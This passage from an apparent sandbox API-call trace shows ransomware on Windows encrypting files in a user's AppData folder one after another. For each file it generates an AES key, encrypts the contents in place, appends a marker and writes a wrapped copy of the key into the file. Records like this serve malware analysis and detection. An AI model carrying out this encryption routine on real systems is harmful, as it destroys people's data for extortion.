dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.396] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.397] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.397] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.397] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.397] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.397] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x166f1, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x166f1, lpOverlapped=0x0) returned 1 [0150.400] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.400] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x166f1, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x16700) returned 1 [0150.400] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.400] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x16700, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x16700, lpOverlapped=0x0) returned 1 [0150.401] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.401] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.401] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.401] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.401] CloseHandle (hObject=0x18c) returned 1 [0150.416] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.420] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.420] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.420] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.420] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.421] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qk1u27.mp3", dwFileAttributes=0x80) returned 1 [0150.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qk1u27.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qk1u27.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.421] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=3452) returned 1 [0150.421] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=3452) returned 1 [0150.421] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xc5a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.421] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.422] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.422] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.422] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.422] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.422] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd7c, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xd7c, lpOverlapped=0x0) returned 1 [0150.422] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.422] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xd7c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xd80) returned 1 [0150.422] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.422] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xd80, lpOverlapped=0x0) returned 1 [0150.422] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.422] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.422] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.422] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.423] CloseHandle (hObject=0x18c) returned 1 [0150.449] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.453] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.453] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.454] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.454] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.454] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qLqbK-XfZLuP.png", dwFileAttributes=0x80) returned 1 [0150.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qLqbK-XfZLuP.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qlqbk-xfzlup.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.454] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=60554) returned 1 [0150.454] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=60554) returned 1 [0150.454] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xeb68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.454] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.455] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.455] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.455] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.455] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.455] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xec8a, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xec8a, lpOverlapped=0x0) returned 1 [0150.456] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.456] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xec8a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xec90) returned 1 [0150.457] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.457] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xec90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xec90, lpOverlapped=0x0) returned 1 [0150.457] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.457] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.457] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.457] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.457] CloseHandle (hObject=0x18c) returned 1 [0150.473] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.477] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.477] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.477] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.477] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.477] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qztVdCi.png", dwFileAttributes=0x80) returned 1 [0150.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qztVdCi.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qztvdci.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.478] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=9730) returned 1 [0150.478] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=9730) returned 1 [0150.478] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x24e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.478] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.479] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.479] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.479] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.479] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.479] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2602, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x2602, lpOverlapped=0x0) returned 1 [0150.479] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.479] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x2602, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x2610) returned 1 [0150.479] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.479] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x2610, lpOverlapped=0x0) returned 1 [0150.479] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.479] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.479] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.480] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.480] CloseHandle (hObject=0x18c) returned 1 [0150.496] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.500] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.500] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.500] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.500] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.500] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sG AI5nveJFDU.mp4", dwFileAttributes=0x80) returned 1 [0150.501] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sG AI5nveJFDU.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sg ai5nvejfdu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.501] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=80274) returned 1 [0150.501] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=80274) returned 1 [0150.501] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x13870, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.501] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.502] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.502] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.502] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.502] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.502] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x13992, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x13992, lpOverlapped=0x0) returned 1 [0150.503] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.503] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x13992, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x139a0) returned 1 [0150.503] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.503] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x139a0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x139a0, lpOverlapped=0x0) returned 1 [0150.504] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.504] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.504] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.504] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.504] CloseHandle (hObject=0x18c) returned 1 [0150.519] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.523] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.523] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.524] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.524] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.524] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szt7y6kA cW.odt", dwFileAttributes=0x80) returned 1 [0150.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szt7y6kA cW.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\szt7y6ka cw.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.524] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=40362) returned 1 [0150.524] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=40362) returned 1 [0150.524] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x9c88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.524] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.525] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.525] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.525] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.525] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.525] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9daa, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x9daa, lpOverlapped=0x0) returned 1 [0150.526] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.526] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x9daa, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x9db0) returned 1 [0150.526] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.526] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9db0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x9db0, lpOverlapped=0x0) returned 1 [0150.526] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.526] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.526] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.526] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.526] CloseHandle (hObject=0x18c) returned 1 [0150.543] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.547] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.547] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.547] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.547] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tB06YZR06 MsHas.bmp", dwFileAttributes=0x80) returned 1 [0150.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tB06YZR06 MsHas.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tb06yzr06 mshas.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 